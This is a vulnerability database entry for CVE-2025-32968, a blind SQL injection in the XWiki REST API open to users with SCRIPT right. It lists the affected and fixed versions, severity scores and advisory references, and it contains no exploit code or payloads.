CVE-2025-32968
Published: 23 April 2025
Summary
CVE-2025-32968 is a high-severity SQL Injection (CWE-89) vulnerability in Xwiki Xwiki. Its CVSS base score is 8.6 (High).
Operationally, ranked in the top 36.8% of CVEs by exploit likelihood; it is not currently listed in the CISA KEV catalog; a public proof-of-concept is referenced.
Deeper analysis
XWiki is a generic wiki platform affected by CVE-2025-32968, a blind SQL injection vulnerability present in versions from 1.6-milestone-1 through 15.10.15, 16.4.5, and 16.10.0. The flaw allows a user holding SCRIPT right to break out of the HQL execution context in a REST API endpoint and inject arbitrary SQL statements against the backend database. The issue is tracked under CWE-89 and carries a CVSS 4.0 score of 8.6.
An attacker with SCRIPT right can exploit the weakness to retrieve sensitive data such as password hashes or, depending on the database backend, issue UPDATE, INSERT, or DELETE statements. Because the injection occurs through an authenticated API path, the attacker needs no additional user interaction or special network position beyond the granted script privilege.
The GitHub Security Advisory GHSA-g9jj-75mx-wjcx and the linked XWiki Jira ticket XWIKI-22718 state that the vulnerability is fixed in releases 15.10.16, 16.4.6, and 16.10.1. The correction applies the same query-validation logic already used for complete SELECT statements; no other workaround is provided.
EPSS for the CVE rose from a low baseline to a recorded peak of 0.0123, indicating that exploitation interest increased after public disclosure.
EU & UK References
- 🇪🇺 ENISA EUVD: EUVD-2025-12169
Vulnerability details
XWiki is a generic wiki platform. In versions starting from 1.6-milestone-1 to before 15.10.16, 16.4.6, and 16.10.1, it is possible for a user with SCRIPT right to escape from the HQL execution context and perform a blind SQL injection to…
more
execute arbitrary SQL statements on the database backend. Depending on the used database backend, the attacker may be able to not only obtain confidential information such as password hashes from the database, but also execute UPDATE/INSERT/DELETE queries. This issue has been patched in versions 16.10.1, 16.4.6 and 15.10.16. There is no known workaround, other than upgrading XWiki. The protection added to this REST API is the same as the one used to validate complete select queries, making it more consistent. However, while the script API always had this protection for complete queries, it's important to note that it's a very strict protection and some valid, but complex, queries might suddenly require the author to have programming right.
- CWE(s)
Related Threats
No named actor attribution yet. ATT&CK technique mapping in progress for this CVE.
Affected Assets
Mitigating Controls
Likely Mitigating Controls AI
Per-CVE control mapping for this CVE has not run yet; the list below is derived from the weakness types (CWEs) cited in the NVD entry.